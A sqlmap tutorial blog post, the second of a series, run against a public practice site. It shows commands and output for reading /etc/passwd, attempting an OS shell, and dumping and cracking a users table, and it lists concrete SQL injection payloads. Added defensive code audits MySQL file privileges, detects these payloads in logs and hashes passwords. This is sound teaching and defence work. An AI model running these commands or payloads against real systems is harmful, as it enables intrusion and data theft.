SQLmap, an essential tool in your arsenal II

Today we continue with the second part on SQLmap. In the first part we saw several examples of extracting information from a website that has a SQL injection.

User privileges:

Depending on which user the database runs as, it will hold one set of privileges or another; with SQLmap we can see what this user is able to do. We launch the tool with the corresponding flag:

darkmac:sqlmap-dev marc$ python sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 --privileges

The resulting output is:

[18:58:19] [INFO] fetching database users privileges
database management system users privileges:
[*] 'acuart'@'localhost' [1]:
    privilege: USAGE

If more than one user administered the database, it would enumerate the privileges of each one.

Reading remote files.

If the database user the web page runs under has write and read permissions, we will be able to download files from the web server. The corresponding flag is:

darkmac:sqlmap-dev marc$ python sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 --file-read=/etc/passwd

SQLmap downloads the file so that we can read it later.

[19:00:24] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0
[19:00:24] [INFO] fingerprinting the back-end DBMS operating system
[19:00:25] [INFO] the back-end DBMS operating system is Linux
[19:00:25] [INFO] fetching file: '/etc/passwd'
do you want confirmation that the remote file '/etc/passwd' has been successfully downloaded from the back-end DBMS file system? [Y/n] Y
[19:00:33] [WARNING] it looks like the file has not been written, this can occur if the DBMS process' user has no write privileges in the destination path
files saved to [1]:
[*] /Users/marc/tools/pentest/web/sqlmap-dev/output/testphp.vulnweb.com/files/_etc_passwd (size differs from remote file)
[19:00:33] [INFO] fetched data logged to text files under '/Users/marc/tools/pentest/web/sqlmap-dev/output/testphp.vulnweb.com'
[*] shutting down at 19:00:33

Shell on the server

If we are lucky enough to hold the required permissions, we can run a shell on the server. The corresponding SQLmap flag is:

darkmac:sqlmap-dev marc$ python sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 --os-shell

SQLmap will ask which kind of shell we want:

which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
>

If it is unable to find the document root, it will offer more options, among them a brute-force search of the web directory.

[19:48:18] [WARNING] unable to retrieve automatically the web server document root
what do you want to use for web server document root?
[1] common location(s) '/var/www/' (default)
[2] custom location
[3] custom directory list file
[4] brute force search

The brute-force attempts are printed to the screen as they run.

> 4
[20:01:31] [INFO] retrieved web server full paths: '/hj/var/www/listproducts.php'
[20:01:31] [INFO] trying to upload the file stager on '/var/www' via LIMIT INTO OUTFILE technique
[20:01:33] [INFO] heuristics detected web page charset 'ascii'
[20:01:33] [WARNING] unable to upload the file stager on '/var/www'
[20:01:33] [INFO] trying to upload the file stager on '/var/www' via UNION technique
[20:01:36] [WARNING] expect junk characters inside the file as a leftover from UNION query
[20:01:38] [WARNING] it looks like the file has not been written, this can occur if the DBMS process' user has no write privileges in the destination path
[20:01:40] [INFO] trying to upload the file stager on '/hj/var/www' via LIMIT INTO OUTFILE technique
[20:01:43] [WARNING] unable to upload the file stager on '/hj/var/www'
[20:01:43] [INFO] trying to upload the file stager on '/hj/var/www' via UNION technique
[20:01:43] [WARNING] it looks like the file has not been written, this can occur if the DBMS process' user has no write privileges in the destination path
[20:01:44] [INFO] trying to upload the file stager on '/var/www/html' via LIMIT INTO OUTFILE technique
[20:01:45] [WARNING] unable to upload the file stager on '/var/www/html'
[20:01:45] [INFO] trying to upload the file stager on '/var/www/html' via UNION technique
[20:01:47] [WARNING] it looks like the file has not been written, this can occur if the DBMS process' user has no write privileges in the destination path
[20:01:48] [INFO] trying to upload the file stager on '/var/www/htdocs' via LIMIT INTO OUTFILE technique
[20:01:48] [WARNING] unable to upload the file stager on '/var/www/htdocs'
[20:01:48] [INFO] trying to upload the file stager on '/var/www/htdocs' via UNION technique
[20:01:49] [WARNING] it looks like the file has not been written, this can occur if the DBMS process' user has no write privileges in the destination path
[20:01:50] [INFO] trying to upload the file stager on '/var/www/httpdocs' via LIMIT INTO OUTFILE technique
[20:01:51] [WARNING] unable to upload the file stager on '/var/www/httpdocs'
[20:01:51] [INFO] trying to upload the file stager on '/var/www/httpdocs' via UNION technique
[20:01:53] [WARNING] it looks like the file has not been written, this can occur if the DBMS process' user has no write privileges in the destination path
[20:01:53] [INFO] trying to upload the file stager on '/var/www/php' via LIMIT INTO OUTFILE technique
[20:01:54] [WARNING] unable to upload the file stager on '/var/www/php'
[20:01:54] [INFO] trying to upload the file stager on '/var/www/php' via UNION technique
[20:01:55] [WARNING] it looks like the file has not been written, this can occur if the DBMS process' user has no write privileges in the destination path
[20:01:57] [INFO] trying to upload the file stager on '/var/www/public' via LIMIT INTO OUTFILE technique
[20:01:58] [WARNING] unable to upload the file stager on '/var/www/public'
[20:01:58] [INFO] trying to upload the file stager on '/var/www/public' via UNION technique
[20:01:58] [WARNING] it looks like the file has not been written, this can occur if the DBMS process' user has no write privileges in the destination path
[20:01:58] [INFO] trying to upload the file stager on '/var/www/src' via LIMIT INTO OUTFILE technique
[20:02:04] [WARNING] unable to upload the file stager on '/var/www/src'
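Both the file read in the previous section and the stager uploads attempted here depend on the same two server-side conditions: the database account must hold MySQL's FILE privilege (a USAGE-only account like the one reported by --privileges cannot write with INTO OUTFILE, which is consistent with the "no write privileges" warnings above), and the server's secure_file_priv setting must not restrict the paths involved. The audit script below is an added example, not code from the original post or from sqlmap. It parses a constructed my.cnf fragment and constructed SHOW GRANTS style lines (every account except acuart is invented) and reports the findings a hardening review would act on.

```python
import re

# Constructed my.cnf fragments (not taken from the post). The first leaves
# secure_file_priv empty, which places no path restriction on LOAD_FILE()
# and SELECT ... INTO OUTFILE; the second disables both entirely.
MY_CNF_WEAK = """
[mysqld]
datadir = /var/lib/mysql
secure_file_priv =
"""

MY_CNF_HARDENED = """
[mysqld]
datadir = /var/lib/mysql
secure_file_priv = NULL
"""

# Constructed SHOW GRANTS style output. 'acuart' mirrors the USAGE-only result
# the post obtained; 'webapp' and 'reports' are invented over-privileged accounts.
GRANTS = [
    "GRANT USAGE ON *.* TO 'acuart'@'localhost'",
    "GRANT SELECT, INSERT, UPDATE ON `acuart`.* TO 'acuart'@'localhost'",
    "GRANT ALL PRIVILEGES ON *.* TO 'webapp'@'%' WITH GRANT OPTION",
    "GRANT SELECT, FILE ON *.* TO 'reports'@'10.0.0.5'",
]


def secure_file_priv(cnf_text):
    """Return the secure_file_priv value from the [mysqld] section, or None if unset."""
    section = None
    for raw in cnf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")):
            continue
        header = re.match(r"\[(.+)\]$", line)
        if header:
            section = header.group(1).strip().lower()
            continue
        if section != "mysqld":
            continue
        key, _, value = line.partition("=")
        if key.strip().lower().replace("-", "_") == "secure_file_priv":
            return value.strip().strip('"').strip("'")
    return None


def file_priv_risk(value):
    """Classify the setting: unset or empty means any path the mysqld process can reach."""
    if value is None or value == "":
        return "unrestricted"
    if value.upper() == "NULL":
        return "disabled"
    return "limited:" + value


def accounts_with_file_privilege(grants):
    """Accounts that can read/write server files: FILE or ALL PRIVILEGES granted on *.*."""
    risky = []
    for grant in grants:
        m = re.match(r"GRANT\s+(.+?)\s+ON\s+(\S+)\s+TO\s+(\S+)", grant, re.IGNORECASE)
        if not m:
            continue
        privs = {p.strip().upper() for p in m.group(1).split(",")}
        scope, account = m.group(2), m.group(3)
        if scope == "*.*" and privs & {"FILE", "ALL", "ALL PRIVILEGES"}:
            risky.append(account)
    return risky


def audit(cnf_text, grants):
    """Combine both checks into a list of findings."""
    findings = []
    if file_priv_risk(secure_file_priv(cnf_text)) == "unrestricted":
        findings.append("secure_file_priv is empty or unset: file import/export is not path-restricted")
    for account in accounts_with_file_privilege(grants):
        findings.append(f"{account} holds FILE (directly or via ALL PRIVILEGES) on *.*")
    return findings


if __name__ == "__main__":
    for name, cnf in (("weak", MY_CNF_WEAK), ("hardened", MY_CNF_HARDENED)):
        print(name, file_priv_risk(secure_file_priv(cnf)))
    for finding in audit(MY_CNF_WEAK, GRANTS):
        print("FINDING:", finding)
```

A web application account needs nothing beyond SELECT/INSERT/UPDATE/DELETE on its own schema; FILE on *.* is what turns a SQL injection into file read and, with a writable document root, into a web shell.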

Automating the tool even further

Going through SQLmap's options I came across one I did not know about: a wizard that runs the tests and the data extraction for us.

The flag is --wizard.

darkmac:sqlmap-dev marc$ python sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 --wizard

It prompts us for the options and launches the attacks as it goes.

POST data (--data) [Enter for None]:
Injection difficulty (--level/--risk). Please choose:
[1] Normal (default)
[2] Medium
[3] Hard
> 1

More options

Enumeration (--banner/--current-user/etc). Please choose:
[1] Basic (default)
[2] Intermediate
[3] All
> 3

It will extract all the information:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: cat
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 4891=4891

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat=1 AND (SELECT 6213 FROM(SELECT COUNT(*),CONCAT(0x3a7862783a,(SELECT (CASE WHEN (6213=6213) THEN 1 ELSE 0 END)),0x3a716e663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: cat=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x3a7862783a,0x5564697071794f627263,0x3a716e663a),NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: cat=1 AND SLEEP(5)
---
web application technology: Nginx, PHP 5.3.10
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: MySQL 5.0
banner: '5.1.69-0ubuntu0.10.04.1'
current user: 'acuart@localhost'
current database: 'acuart'
hostname: 'rs202995'
current user is DBA: False
database management system users [1]:
[*] 'acuart'@'localhost'
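The payloads sqlmap reported above are also exactly what a defender should be looking for in the web server's access logs. The detector below is an added example and not part of the original post: it runs over constructed nginx access-log lines (the client IP, timestamps and user-agent strings are invented) and flags requests whose URL-decoded query string matches the boolean-, time-, UNION- and error-based patterns seen above, as well as requests carrying a sqlmap user agent.

```python
import re
from urllib.parse import unquote_plus

# Constructed nginx access-log lines (combined format). The payloads repeat the
# four injection types sqlmap reported above; the first request is benign.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Nov/2013:19:48:18 +0100] "GET /listproducts.php?cat=1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Nov/2013:19:48:19 +0100] "GET /listproducts.php?cat=1%20AND%204891%3D4891 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Nov/2013:19:48:20 +0100] "GET /listproducts.php?cat=1%20AND%20SLEEP(5) HTTP/1.1" 200 5123 "-" "sqlmap/1.0-dev"
203.0.113.7 - - [10/Nov/2013:19:48:26 +0100] "GET /listproducts.php?cat=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,CONCAT(0x3a7862783a,0x5564697071794f627263,0x3a716e663a),NULL%23 HTTP/1.1" 200 6011 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Nov/2013:19:48:27 +0100] "GET /listproducts.php?cat=1%20AND%20(SELECT%206213%20FROM(SELECT%20COUNT(*),CONCAT(0x3a7862783a,(SELECT%20(CASE%20WHEN%20(6213%3D6213)%20THEN%201%20ELSE%200%20END)),0x3a716e663a,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a) HTTP/1.1" 500 812 "-" "sqlmap/1.0-dev"
"""

# Combined log format: ip ident user [time] "method target proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Each rule is matched against the URL-decoded request target. The names map
# onto the injection types in the sqlmap report above.
PAYLOAD_RULES = {
    "boolean_tautology": re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.IGNORECASE),
    "time_based_sleep": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.IGNORECASE),
    "union_select_null": re.compile(r"\bUNION\s+ALL\s+SELECT\s+NULL\b", re.IGNORECASE),
    "error_based_floor_rand": re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.IGNORECASE),
    "information_schema": re.compile(r"\bINFORMATION_SCHEMA\b", re.IGNORECASE),
}


def classify_request(target, user_agent):
    """Return the list of rule names a single request triggers (empty if benign)."""
    decoded = unquote_plus(target)  # payloads arrive percent-encoded; match the decoded form
    hits = [name for name, rx in PAYLOAD_RULES.items() if rx.search(decoded)]
    if "sqlmap" in user_agent.lower():  # default UA unless --random-agent / --user-agent is used
        hits.append("sqlmap_user_agent")
    return hits


def scan_log(text):
    """Parse combined-format lines and return one alert dict per suspicious request."""
    alerts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: a real pipeline would count these separately
        hits = classify_request(m.group("target"), m.group("ua"))
        if hits:
            alerts.append({"ip": m.group("ip"), "target": unquote_plus(m.group("target")), "rules": hits})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["ip"], ", ".join(alert["rules"]), "->", alert["target"])
```

Signature rules like these catch default sqlmap runs but not a hand-tuned one with tamper scripts or a spoofed user agent, so treat them as a first detection layer in front of parameterised queries rather than a substitute for them.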

Since it is a wizard, it carries the attack through on its own:

do you want to crack them via a dictionary-based attack? [Y/n/q] Y
what dictionary do you want to use?
[1] default dictionary file '/Users/marc/tools/pentest/web/sqlmap-dev/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
do you want to use common password suffixes? (slow!) [y/N] N
Database: acuart
Table: users
[1 entry]
+---------------------+------+----------------------------------+------+-------+---------+-------------------+---------+
| cc                  | name | cart                             | pass | uname | phone   | email             | address |
+---------------------+------+----------------------------------+------+-------+---------+-------------------+---------+
| 1234-5678-2300-9000 | ram  | 18422368bd6d70df5d32f7f52bc76666 | test | test  | 2323345 | [email protected] |         |
+---------------------+------+----------------------------------+------+-------+---------+-------------------+---------+
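The dumped users table holds the password in the clear (the pass column reads test), so the dump is an immediate credential leak, and a dictionary attack is only needed where hashes are stored unsalted. As an added example that is not from the original post, this is how that column should be stored instead: a per-user salted PBKDF2-SHA256 record, verified in constant time, with the work factor recorded in the record so it can be raised later. The iteration count is an assumption to be tuned for your hardware.

```python
import hashlib
import hmac
import os

# Assumed work factor: chosen so one check stays well under a second on
# commodity hardware while making offline dictionary attacks expensive.
ITERATIONS = 600_000
ALGORITHM = "pbkdf2_sha256"


def hash_password(password, salt=None, iterations=ITERATIONS):
    """Return a self-describing record: algorithm$iterations$salt_hex$digest_hex."""
    if salt is None:
        salt = os.urandom(16)  # fresh per-user salt: equal passwords yield different records
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"{ALGORITHM}${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password, record):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algorithm, iterations, salt_hex, digest_hex = record.split("$")
    if algorithm != ALGORITHM:
        raise ValueError("unsupported record format")
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))


def needs_rehash(record, iterations=ITERATIONS):
    """True when the stored record was produced with a lower work factor than current policy."""
    _, stored_iterations, _, _ = record.split("$")
    return int(stored_iterations) < iterations


if __name__ == "__main__":
    # What the dumped pass column would have contained for the value 'test'.
    record = hash_password("test")
    print(record)
    print("login ok:", verify_password("test", record))
    print("wrong password:", verify_password("Test", record))
```

With records like these, a table dump obtained through SQL injection yields salts and digests rather than passwords, and the iteration count is the cost every guess of a dictionary attack has to pay.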

In the final installment we will look at more of the available options. Enjoy.



Author: Seifreed

Trained in an anti-fraud team. I have worked implementing fraud protection and prevention for several clients in the national and international banking sector. My job consists of finding solutions to the current and future problems financial institutions face regarding malicious code and fraud. Specialities such as malware analysis, forensic analysis, reverse engineering and ethical hacking tasks are part of my daily work. I am a speaker at national events (No cON Name, OWASP, Navaja Negra) and international ones (DragonJAR CON - Colombia). I am an associate professor at La Salle, teaching the MPWAR course (Master in High Performance Web Programming) and La Salle's cybersecurity master's (MCS, Master in Cybersecurity). Member of associations and research groups such as the HoneyNet Project, OWASP, SySsec, etc. I am also the organizer of the Hack&Beers conferences in Barcelona.
